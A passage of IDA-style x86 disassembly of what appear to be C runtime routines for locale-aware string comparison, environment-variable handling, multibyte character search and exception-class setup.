jle short loc_439D5C
cmp [ebp+var_3C], 2
jnb short loc_439CF9
mov eax, 1
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439CF9: ; CODE XREF: sub_439AD0+21D�j
lea edx, [ebp+var_36]
mov [ebp+var_40], edx
jmp short loc_439D0A
; ---------------------------------------------------------------------------
loc_439D01: ; CODE XREF: sub_439AD0:loc_439D50�j
mov eax, [ebp+var_40]
add eax, 2
mov [ebp+var_40], eax
loc_439D0A: ; CODE XREF: sub_439AD0+22F�j
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_439D52
mov eax, [ebp+var_40]
xor ecx, ecx
mov cl, [eax+1]
test ecx, ecx
jz short loc_439D52
mov edx, [ebp+arg_10]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx]
cmp eax, edx
jl short loc_439D50
mov eax, [ebp+arg_10]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx+1]
cmp ecx, eax
jg short loc_439D50
mov eax, 2
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439D50: ; CODE XREF: sub_439AD0+261�j
; sub_439AD0+274�j
jmp short loc_439D01
; ---------------------------------------------------------------------------
loc_439D52: ; CODE XREF: sub_439AD0+243�j
; sub_439AD0+24F�j
mov eax, 1
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439D5C: ; CODE XREF: sub_439AD0+10A�j
; sub_439AD0+217�j
push 0
push 0
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 9
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_439D84
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439D84: ; CODE XREF: sub_439AD0+2AB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_44], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_44]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_439DC6
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_439DC6: ; CODE XREF: sub_439AD0+2DD�j
cmp [ebp+var_24], 0
jnz short loc_439DD3
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439DD3: ; CODE XREF: sub_439AD0+2FA�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
test eax, eax
jnz short loc_439DFA
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439DFA: ; CODE XREF: sub_439AD0+321�j
push 0
push 0
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
push 9
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_439E22
xor eax, eax
jmp loc_439EB4
; ---------------------------------------------------------------------------
loc_439E22: ; CODE XREF: sub_439AD0+349�j
mov [ebp+var_4], 1
mov eax, [ebp+var_20]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_48], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_48]
mov [ebp+var_28], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_439E64
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_28], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_439E64: ; CODE XREF: sub_439AD0+37B�j
cmp [ebp+var_28], 0
jnz short loc_439E6E
xor eax, eax
jmp short loc_439EB4
; ---------------------------------------------------------------------------
loc_439E6E: ; CODE XREF: sub_439AD0+398�j
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_28]
push eax
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
test eax, eax
jnz short loc_439E92
xor eax, eax
jmp short loc_439EB4
; ---------------------------------------------------------------------------
loc_439E92: ; CODE XREF: sub_439AD0+3BC�j
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_1C]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F52DC ; CompareStringW
jmp short loc_439EB4
; ---------------------------------------------------------------------------
loc_439EB2: ; CODE XREF: sub_439AD0+EB�j
xor eax, eax
loc_439EB4: ; CODE XREF: sub_439AD0+81�j
; sub_439AD0+DF�j ...
lea esp, [ebp-54h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_439AD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439ED0 proc near ; CODE XREF: sub_439AD0+94�p
; sub_439AD0+AD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_439EE2: ; CODE XREF: sub_439ED0+35�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_439F07
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_439F07
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_439EE2
; ---------------------------------------------------------------------------
loc_439F07: ; CODE XREF: sub_439ED0+20�j
; sub_439ED0+2A�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_439F19
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
jmp short loc_439F1C
; ---------------------------------------------------------------------------
loc_439F19: ; CODE XREF: sub_439ED0+3F�j
mov eax, [ebp+arg_4]
loc_439F1C: ; CODE XREF: sub_439ED0+47�j
mov esp, ebp
pop ebp
retn
sub_439ED0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439F20 proc near ; CODE XREF: sub_4396D0+92�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
cmp [ebp+arg_0], 0
jz short loc_439F4C
push 3Dh
mov eax, [ebp+arg_0]
push eax
call sub_43A370
add esp, 8
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_439F4C
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+var_18]
jnz short loc_439F54
loc_439F4C: ; CODE XREF: sub_439F20+B�j
; sub_439F20+22�j
or eax, 0FFFFFFFFh
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_439F54: ; CODE XREF: sub_439F20+2A�j
mov edx, [ebp+var_18]
movsx eax, byte ptr [edx+1]
neg eax
sbb eax, eax
inc eax
mov [ebp+var_14], eax
mov ecx, ds:dword_4F3314
cmp ecx, ds:dword_4F3318
jnz short loc_439F85
mov edx, ds:dword_4F3314
push edx
call sub_43A280
add esp, 4
mov ds:dword_4F3314, eax
loc_439F85: ; CODE XREF: sub_439F20+4F�j
cmp ds:dword_4F3314, 0
jnz loc_43A045
cmp [ebp+arg_4], 0
jz short loc_439FB7
cmp ds:dword_4F331C, 0
jz short loc_439FB7
call sub_4396D0
test eax, eax
jz short loc_439FB2
or eax, 0FFFFFFFFh
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_439FB2: ; CODE XREF: sub_439F20+88�j
jmp loc_43A045
; ---------------------------------------------------------------------------
loc_439FB7: ; CODE XREF: sub_439F20+76�j
; sub_439F20+7F�j
cmp [ebp+var_14], 0
jz short loc_439FC4
xor eax, eax
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_439FC4: ; CODE XREF: sub_439F20+9B�j
cmp ds:dword_4F3314, 0
jnz short loc_43A004
push 87h
push offset dword_43E0F0
push 2
push 4
call sub_41BE70
add esp, 10h
mov ds:dword_4F3314, eax
cmp ds:dword_4F3314, 0
jnz short loc_439FF9
or eax, 0FFFFFFFFh
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_439FF9: ; CODE XREF: sub_439F20+CF�j
mov eax, ds:dword_4F3314
mov dword ptr [eax], 0
loc_43A004: ; CODE XREF: sub_439F20+AB�j
cmp ds:dword_4F331C, 0
jnz short loc_43A045
push 8Eh
push offset dword_43E0F0
push 2
push 4
call sub_41BE70
add esp, 10h
mov ds:dword_4F331C, eax
cmp ds:dword_4F331C, 0
jnz short loc_43A039
or eax, 0FFFFFFFFh
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_43A039: ; CODE XREF: sub_439F20+10F�j
mov ecx, ds:dword_4F331C
mov dword ptr [ecx], 0
loc_43A045: ; CODE XREF: sub_439F20+6C�j
; sub_439F20:loc_439FB2�j ...
mov edx, ds:dword_4F3314
mov [ebp+var_C], edx
mov eax, [ebp+var_18]
sub eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_43A200
add esp, 8
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl loc_43A101
mov edx, [ebp+var_C]
cmp dword ptr [edx], 0
jz loc_43A101
cmp [ebp+var_14], 0
jz short loc_43A0F3
push 2
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ecx+eax*4]
push edx
call sub_41CA10
add esp, 8
jmp short loc_43A09F
; ---------------------------------------------------------------------------
loc_43A096: ; CODE XREF: sub_439F20+19E�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_43A09F: ; CODE XREF: sub_439F20+174�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
cmp dword ptr [edx+ecx*4], 0
jz short loc_43A0C0
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov esi, [ebp+var_C]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4], edx
jmp short loc_43A096
; ---------------------------------------------------------------------------
loc_43A0C0: ; CODE XREF: sub_439F20+189�j
push 0B9h
push offset dword_43E0F0
push 2
mov eax, [ebp+var_8]
shl eax, 2
push eax
mov ecx, [ebp+var_C]
push ecx
call sub_41C360
add esp, 14h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_43A0F1
mov edx, [ebp+var_C]
mov ds:dword_4F3314, edx
loc_43A0F1: ; CODE XREF: sub_439F20+1C6�j
jmp short loc_43A0FF
; ---------------------------------------------------------------------------
loc_43A0F3: ; CODE XREF: sub_439F20+15E�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov edx, [ebp+arg_0]
mov [ecx+eax*4], edx
loc_43A0FF: ; CODE XREF: sub_439F20:loc_43A0F1�j
jmp short loc_43A174
; ---------------------------------------------------------------------------
loc_43A101: ; CODE XREF: sub_439F20+148�j
; sub_439F20+154�j
cmp [ebp+var_14], 0
jnz short loc_43A16D
cmp [ebp+var_8], 0
jge short loc_43A115
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_43A115: ; CODE XREF: sub_439F20+1EB�j
push 0CEh
push offset dword_43E0F0
push 2
mov ecx, [ebp+var_8]
lea edx, ds:8[ecx*4]
push edx
mov eax, [ebp+var_C]
push eax
call sub_41C360
add esp, 14h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_43A149
or eax, 0FFFFFFFFh
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_43A149: ; CODE XREF: sub_439F20+21F�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov eax, [ebp+arg_0]
mov [edx+ecx*4], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_C]
mov dword ptr [edx+ecx*4+4], 0
mov eax, [ebp+var_C]
mov ds:dword_4F3314, eax
jmp short loc_43A174
; ---------------------------------------------------------------------------
loc_43A16D: ; CODE XREF: sub_439F20+1E5�j
xor eax, eax
jmp loc_43A1FB
; ---------------------------------------------------------------------------
loc_43A174: ; CODE XREF: sub_439F20:loc_43A0FF�j
; sub_439F20+24B�j
cmp [ebp+arg_4], 0
jz short loc_43A1F9
push 0E5h
push offset dword_43E0F0
push 2
mov ecx, [ebp+arg_0]
push ecx
call sub_41BC70
add esp, 4
add eax, 2
push eax
call sub_41BE70
add esp, 10h
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_43A1F9
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_10]
push eax
call sub_41F620
add esp, 8
mov ecx, [ebp+var_18]
sub ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
add edx, ecx
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
neg edx
sbb edx, edx
not edx
and edx, [ebp+var_4]
push edx
mov eax, [ebp+var_10]
push eax
call ds:dword_4F52D8 ; SetEnvironmentVariableA
push 2
mov ecx, [ebp+var_10]
push ecx
call sub_41CA10
add esp, 8
loc_43A1F9: ; CODE XREF: sub_439F20+258�j
; sub_439F20+285�j
xor eax, eax
loc_43A1FB: ; CODE XREF: sub_439F20+2F�j
; sub_439F20+8D�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_439F20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A200 proc near ; CODE XREF: sub_439F20+139�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4F3314
mov [ebp+var_4], eax
jmp short loc_43A217
; ---------------------------------------------------------------------------
loc_43A20E: ; CODE XREF: sub_43A200:loc_43A268�j
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
loc_43A217: ; CODE XREF: sub_43A200+C�j
mov edx, [ebp+var_4]
cmp dword ptr [edx], 0
jz short loc_43A26A
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_439680
add esp, 0Ch
test eax, eax
jnz short loc_43A268
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [edx+eax]
cmp ecx, 3Dh
jz short loc_43A25A
mov edx, [ebp+var_4]
mov eax, [edx]
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [eax+ecx]
test edx, edx
jnz short loc_43A268
loc_43A25A: ; CODE XREF: sub_43A200+48�j
mov eax, [ebp+var_4]
sub eax, ds:dword_4F3314
sar eax, 2
jmp short loc_43A278
; ---------------------------------------------------------------------------
loc_43A268: ; CODE XREF: sub_43A200+37�j
; sub_43A200+58�j
jmp short loc_43A20E
; ---------------------------------------------------------------------------
loc_43A26A: ; CODE XREF: sub_43A200+1D�j
mov eax, [ebp+var_4]
sub eax, ds:dword_4F3314
sar eax, 2
neg eax
loc_43A278: ; CODE XREF: sub_43A200+66�j
mov esp, ebp
pop ebp
retn
sub_43A200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A280 proc near ; CODE XREF: sub_439F20+58�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
cmp [ebp+arg_0], 0
jnz short loc_43A2A0
xor eax, eax
jmp loc_43A36A
; ---------------------------------------------------------------------------
loc_43A2A0: ; CODE XREF: sub_43A280+17�j
; sub_43A280+3B�j
mov ecx, [ebp+var_C]
mov edx, [ecx]
mov eax, [ebp+var_C]
add eax, 4
mov [ebp+var_C], eax
test edx, edx
jz short loc_43A2BD
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
jmp short loc_43A2A0
; ---------------------------------------------------------------------------
loc_43A2BD: ; CODE XREF: sub_43A280+30�j
push 146h
push offset dword_43E0F0
push 2
mov edx, [ebp+var_10]
lea eax, ds:4[edx*4]
push eax
call sub_41BE70
add esp, 10h
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov [ebp+var_4], ecx
cmp [ebp+var_4], 0
jnz short loc_43A2F5
push 9
call sub_422270
add esp, 4
loc_43A2F5: ; CODE XREF: sub_43A280+69�j
mov edx, [ebp+arg_0]
mov [ebp+var_C], edx
loc_43A2FB: ; CODE XREF: sub_43A280+DC�j
mov eax, [ebp+var_C]
cmp dword ptr [eax], 0
jz short loc_43A35E
push 14Fh
push offset dword_43E0F0
push 2
mov ecx, [ebp+var_C]
mov edx, [ecx]
push edx
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_41BE70
add esp, 10h
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jz short loc_43A34A
mov eax, [ebp+var_C]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call sub_41F620
add esp, 8
loc_43A34A: ; CODE XREF: sub_43A280+B4�j
mov ecx, [ebp+var_C]
add ecx, 4
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, 4
mov [ebp+var_8], edx
jmp short loc_43A2FB
; ---------------------------------------------------------------------------
loc_43A35E: ; CODE XREF: sub_43A280+81�j
mov eax, [ebp+var_8]
mov dword ptr [eax], 0
mov eax, [ebp+var_4]
loc_43A36A: ; CODE XREF: sub_43A280+1B�j
mov esp, ebp
pop ebp
retn
sub_43A280 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A370 proc near ; CODE XREF: sub_439F20+13�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F37DC, 0
jnz short loc_43A392
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41F720
add esp, 8
jmp loc_43A459
; ---------------------------------------------------------------------------
loc_43A392: ; CODE XREF: sub_43A370+B�j
push 19h
call sub_423280
add esp, 4
jmp short loc_43A3A7
; ---------------------------------------------------------------------------
loc_43A39E: ; CODE XREF: sub_43A370:loc_43A436�j
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
loc_43A3A7: ; CODE XREF: sub_43A370+2C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
mov word ptr [ebp+var_4], cx
mov edx, [ebp+var_4]
and edx, 0FFFFh
test edx, edx
jz short loc_43A43B
mov eax, [ebp+var_4]
and eax, 0FFh
xor ecx, ecx
mov cl, ds:byte_4F38E1[eax]
and ecx, 4
test ecx, ecx
jz short loc_43A426
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jnz short loc_43A3F8
push 19h
call sub_423320
add esp, 4
xor eax, eax
jmp short loc_43A459
; ---------------------------------------------------------------------------
loc_43A3F8: ; CODE XREF: sub_43A370+78�j
mov edx, [ebp+var_4]
and edx, 0FFFFh
shl edx, 8
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
or edx, ecx
cmp [ebp+arg_4], edx
jnz short loc_43A424
push 19h
call sub_423320
add esp, 4
mov eax, [ebp+arg_0]
sub eax, 1
jmp short loc_43A459
; ---------------------------------------------------------------------------
loc_43A424: ; CODE XREF: sub_43A370+A0�j
jmp short loc_43A436
; ---------------------------------------------------------------------------
loc_43A426: ; CODE XREF: sub_43A370+64�j
mov edx, [ebp+var_4]
and edx, 0FFFFh
cmp [ebp+arg_4], edx
jnz short loc_43A436
jmp short loc_43A43B
; ---------------------------------------------------------------------------
loc_43A436: ; CODE XREF: sub_43A370:loc_43A424�j
; sub_43A370+C2�j
jmp loc_43A39E
; ---------------------------------------------------------------------------
loc_43A43B: ; CODE XREF: sub_43A370+4D�j
; sub_43A370+C4�j
push 19h
call sub_423320
add esp, 4
mov eax, [ebp+var_4]
and eax, 0FFFFh
cmp [ebp+arg_4], eax
jnz short loc_43A457
mov eax, [ebp+arg_0]
jmp short loc_43A459
; ---------------------------------------------------------------------------
loc_43A457: ; CODE XREF: sub_43A370+E0�j
xor eax, eax
loc_43A459: ; CODE XREF: sub_43A370+1D�j
; sub_43A370+86�j ...
mov esp, ebp
pop ebp
retn
sub_43A370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A460 proc near ; CODE XREF: sub_40DC67+12�p
; sub_40DCFC+12�p ...
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A460
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
lea eax, [ebp+var_3C]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp+var_38]
call sub_40DC1A
mov [ebp+var_4], 0
lea ecx, [ebp+var_38]
push ecx
lea ecx, [ebp+var_28]
call sub_43A610
push offset dword_43E450
lea edx, [ebp+var_28]
push edx
call sub_43B240
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A4C0 proc near ; CODE XREF: sub_43A550+10�p
; sub_43A730+E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A4C0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_10]
call sub_43AFC0
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
add ecx, 0Ch
push ecx
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DBF4
mov edx, [ebp+var_10]
mov dword ptr [edx], offset off_43E110
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43A4C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A530 proc near ; DATA XREF: _1:0043E114�o _1:0043E124�o ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
add ecx, 0Ch
call sub_40DCD7
mov esp, ebp
pop ebp
retn
sub_43A530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A550 proc near ; DATA XREF: _1:0043E118�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43A4C0
push offset dword_43E4C0
lea ecx, [ebp+var_1C]
push ecx
call sub_43B240
mov esp, ebp
pop ebp
retn
sub_43A550 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A580 proc near ; CODE XREF: sub_43A5E0+A�p
; sub_43A6B0+13�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A580
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov dword ptr [eax], offset off_43E110
mov [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 0Ch
call sub_40DC3D
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
call sub_43B080
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_43A580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A5E0 proc near ; DATA XREF: _1:off_43E110�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43A580
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43A605
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43A605: ; CODE XREF: sub_43A5E0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A5E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A610 proc near ; CODE XREF: sub_43A460+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A640
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E120
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A640 proc near ; CODE XREF: sub_43A610+E�p
; sub_43A7C0+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_43A640
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
mov [ebp+var_14], ecx
mov [ebp+var_10], offset dword_43CF7C
lea eax, [ebp+var_10]
push eax
mov ecx, [ebp+var_14]
call sub_43AF50
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_14]
add ecx, 0Ch
call sub_40DBF4
mov edx, [ebp+var_14]
mov dword ptr [edx], offset off_43E110
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_43A640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A6B0 proc near ; CODE XREF: sub_43A700+A�p
; DATA XREF: _1:0043E454�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_43E120
mov ecx, [ebp+var_4]
call sub_43A580
mov esp, ebp
pop ebp
retn
sub_43A6B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A6D0 proc near ; DATA XREF: _1:0043E128�o
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_1C]
call sub_43A730
push offset dword_43E450
lea ecx, [ebp+var_1C]
push ecx
call sub_43B240
mov esp, ebp
pop ebp
retn
sub_43A6D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A700 proc near ; DATA XREF: _1:off_43E120�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_43A6B0
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_43A725
mov ecx, [ebp+var_4]
push ecx
call sub_420B80
add esp, 4
loc_43A725: ; CODE XREF: sub_43A700+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A730 proc near ; CODE XREF: sub_43A6D0+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
call sub_43A4C0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_43E120
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_43A730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A760 proc near ; CODE XREF: sub_40DD57+17�p
; sub_40DFD6+E�p
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
